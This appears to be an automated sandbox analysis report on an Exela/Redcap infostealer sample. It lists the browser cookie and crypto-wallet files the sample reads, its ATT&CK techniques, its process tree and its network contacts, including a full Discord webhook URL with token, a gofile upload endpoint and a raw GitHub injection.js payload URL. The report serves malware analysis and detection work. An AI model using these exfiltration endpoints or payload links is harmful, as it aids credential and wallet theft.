            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior

            Remote Access Functionality

MITRE ATT&CK Matrix (one line per tactic column; a bracketed figure is the number shown beside that technique in the report's matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: [1] Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: [331] Windows Management Instrumentation; [1] Native API; [22] Command and Scripting Interpreter; [1] Service Execution; [2] PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: [1] DLL Side-Loading; [1] Valid Accounts; [1] Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: [1] DLL Side-Loading; [1] Valid Accounts; [1] Windows Service; [11] Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: [2] Disable or Modify Tools; [11] Deobfuscate/Decode Files or Information; [21] Obfuscated Files or Information; [11] Software Packing; [1] DLL Side-Loading; [11] Masquerading; [1] Valid Accounts; [151] Virtualization/Sandbox Evasion; [11] Process Injection; Dynamic API Resolution
Credential Access: [1] OS Credential Dumping; [1] GUI Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: [12] System Time Discovery; [2] System Network Connections Discovery; [2] File and Directory Discovery; [56] System Information Discovery; [561] Security Software Discovery; [2] Process Discovery; [151] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [1] Remote System Discovery; [31] System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: [1] Archive Collected Data; [4] Data from Local System; [1] GUI Input Capture; [1] Email Collection; [1] Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: [3] Ingress Tool Transfer; [11] Encrypted Channel; [4] Non-Application Layer Protocol; [5] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: [1] Data Encrypted for Impact; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1582938 | Sample: rename_me_before.exe | Startdate: 01/01/2025 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: store1.gofile.io; ip-api.com; 3 other IPs or domains
  Signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Sigma detected: Capture Wi-Fi password; 10 other signatures
  Started:
  - rename_me_before.exe 58
      Dropped: C:\Users\...\_quoting_c.cp311-win_amd64.pyd (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32+); 29 other files (28 malicious)
      Signatures: Modifies the windows firewall; Tries to harvest and steal WLAN passwords; Gathers network related connection and port information
      Started:
      - rename_me_before.exe 140
          DNS/IP: ip-api.com 208.95.112.1, 49739, 80, TUT-ASUS, United States; 162.159.128.233, 443, 49753, CLOUDFLARENETUS, United States; 4 other IPs or domains
          Dropped: C:\Users\user\AppData\Local\...xela.exe (PE32+); C:\Users\user\AppData\...\VLZDGUKUTZ.jpg (ASCII); C:\Users\user\AppData\...\VLZDGUKUTZ.docx (ASCII); 8 other malicious files
          Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Uses cmd line tools excessively to alter registry or file data; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 6 other signatures
          Started:
          - cmd.exe 1
              Signatures: Uses cmd line tools excessively to alter registry or file data; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy; 4 other signatures
              Started: conhost.exe
          - cmd.exe
              Signatures: Overwrites the password of the administrator account; Gathers network related connection and port information; Performs a network lookup / discovery via ARP
              Started:
              - systeminfo.exe (Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines))
                  Started: WmiPrvSE.exe
              - net.exe (Overwrites the password of the administrator account)
                  Started: net1.exe
              - net.exe
                  Started: net1.exe
              - 16 other processes
                  Started: quser.exe; net1.exe; 2 other processes
          - cmd.exe
              Started:
              - powershell.exe (dropped C:\Users\user\AppData\...\iqddoona.cmdline, Unicode)
                  Started: csc.exe (dropped C:\Users\user\AppData\Local\...\iqddoona.dll, PE32)
                      Started: cvtres.exe
              - conhost.exe
          - 12 other processes
              Signatures: Tries to harvest and steal WLAN passwords
              Started:
              - WMIC.exe 1 (Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes); Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes))
              - 23 other processes
                  Started: chcp.com; chcp.com
  - svchost.exe

Source | Detection | Scanner | Label
rename_me_before.exe | 68% | Virustotal |
rename_me_before.exe | 50% | ReversingLabs | Win64.Adware.RedCap
rename_me_before.exe | 100% | Avira | TR/Redcap.woxyt
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | 100% | Avira | TR/Redcap.woxyt
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe | 58% | ReversingLabs | Win64.Trojan.Cerbu
C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings\_rust.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\libcrypto-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\libffi-8.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\libssl-3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\multidict\_multidict.cp311-win_amd64.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\pyexpat.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\select.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pyd | 4% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pyd | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://i.hidHdJb | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svg | 0% | Avira URL Cloud | safe
https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svg | 0% | Avira URL Cloud | safe
https://zopeinterface.readthedocs.io/en/latest/ | 0% | Avira URL Cloud | safe
https://www.attrs.org/en/stable/why.html#data-classes). | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
canary.discord.com | 162.159.137.232 | true | false | | high
store1.gofile.io | 45.112.123.227 | true | false | | high
api.gofile.io | 45.112.123.126 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://store1.gofile.io/uploadFile | false | | high
https://canary.discord.com/api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.attrs.org/en/stable/why.html#data-classes). | rename_me_before.exe memory dump, METADATA.0.dr | false | Avira URL Cloud: safe | unknown
https://i.hidHdJb | rename_me_before.exe memory dump | false | Avira URL Cloud: safe | unknown
https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION | rename_me_before.exe memory dumps | false | | high
https://account.riotgames.com/api/account/v1/user | rename_me_before.exe memory dump | false | | high
https://accounts.reddit.com/api/access_token | rename_me_before.exe memory dump | false | | high
https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9 | rename_me_before.exe memory dumps | false | | high
https://github.com/python-attrs/attrs/issues/251 | rename_me_before.exe memory dumps | false | | high
https://tiktok.com/ | rename_me_before.exe memory dumps | false | | high
https://github.com/aio-libs/aiohttp/discussions/6044 | rename_me_before.exe memory dumps | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.42.dr, qmgr.db.42.dr | false | | high
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok | rename_me_before.exe memory dumps | false | | high
http://python.org | rename_me_before.exe memory dump | false | | high
http://python.org:80 | rename_me_before.exe memory dump | false | | high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | rename_me_before.exe memory dumps | false | | high
https://github.com/sponsors/hynek | METADATA.0.dr | false | | high
https://github.com/pyca/cryptography/actions?query=workflow%3ACI | rename_me_before.exe memory dump, METADATA0.0.dr | false | | high
https://oauth.reddit.com/api/v1/me | rename_me_before.exe memory dumps | false | | high
https://www.apache.org/licenses/LICENSE-2.0 | rename_me_before.exe memory dumps, LICENSE.APACHE.0.dr | false | | high
https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svg | rename_me_before.exe memory dump, METADATA.0.dr | false | Avira URL Cloud: safe | unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | rename_me_before.exe memory dumps | false | | high
https://g.live.com/odclientsettings/Prod.C: | edb.log.42.dr, qmgr.db.42.dr | false | | high
https://github.com/python-attrs/attrs/issues/1200) | rename_me_before.exe memory dumps, METADATA.0.dr | false | |
                                                                high
                                                                https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svgrename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                  high
                                                                  https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                    high
                                                                    https://github.com/python-attrs/attrs)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                      high
                                                                      https://www.attrs.org/)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                        high
                                                                        https://twitter.comrename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870rename_me_before.exe, 00000001.00000003.1890796970.000001B1033C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://twitter.com/homerename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000045.00000002.1843174125.000001DBCF1C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1826414031.000001DBC0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://cacerts.digirename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://docs.python.org/3/library/subprocess#subprocess.Popen.killrename_me_before.exe, 00000001.00000002.1977466088.000001B100D40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/python-attrs/attrs/issues/136rename_me_before.exe, 00000001.00000002.1975958598.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970448147.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100B67000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968725950.000001B1006A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966129249.000001B100693000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100BB8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679902734.000001B1009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&barename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://gofile.io/d/ukhEgs)rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://i.hizliresim.com/8po0puy.jfifrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://peps.python.org/pep-0205/rename_me_before.exe, 00000001.00000002.1974448798.000001B100440000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                              high
                                                                                              http://docs.python.org/3/library/subprocess#subprocess.Popen.returncoderename_me_before.exe, 00000001.00000002.1977564898.000001B100E40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000045.00000002.1826414031.000001DBBF011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&aprename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000002A.00000003.1749773200.000001D218CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drfalse
                                                                                                      high
                                                                                                      https://i.hizliresim.com/6t31tw2.jpgPrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://zopeinterface.readthedocs.io/en/latest/rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975824517.000001B100655000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968170677.000001B100654000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981358821.000001B17FEA8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://go.micropowershell.exe, 00000045.00000002.1826414031.000001DBBFC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://raw.githubusercontent.com/justforExela/injection/main/injection.jsrename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerrename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/python/cpython/issues/86361.rename_me_before.exe, 00000001.00000003.1968595963.000001B1005C0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669775645.000001B1005E2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670268190.000001B100598000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669887991.000001B1005BF000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968509131.000001B1005BD000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966526691.000001B1005BC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100579000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670211447.000001B10058C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B10058C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975257853.000001B1005C1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670048680.000001B1005C3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669837588.000001B1005F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://discord.com/api/v8/users/rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://i.hizliresim.com/qxnzimj.jpgrename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.apache.org/licenses/rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drfalse
                                                                                                                              high
                                                                                                                              https://www.attrs.org/en/latest/names.html)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                high
                                                                                                                                https://www.twitch.tv/rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://crl.ver)svchost.exe, 0000002A.00000002.2920593241.000001D218A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=mainrename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://open.spotify.com/user/rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlrename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rename_me_before.exe, 00000001.00000003.1719040380.000001B103409000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B1034AA000.00000004.00000020.00020000.00000000.sdmp, Historys.txt.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.reddit.com/user/Prename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://filepreviews.io/rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cryptography.io/en/latest/installation/rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drfalse
                                                                                                                                                      high
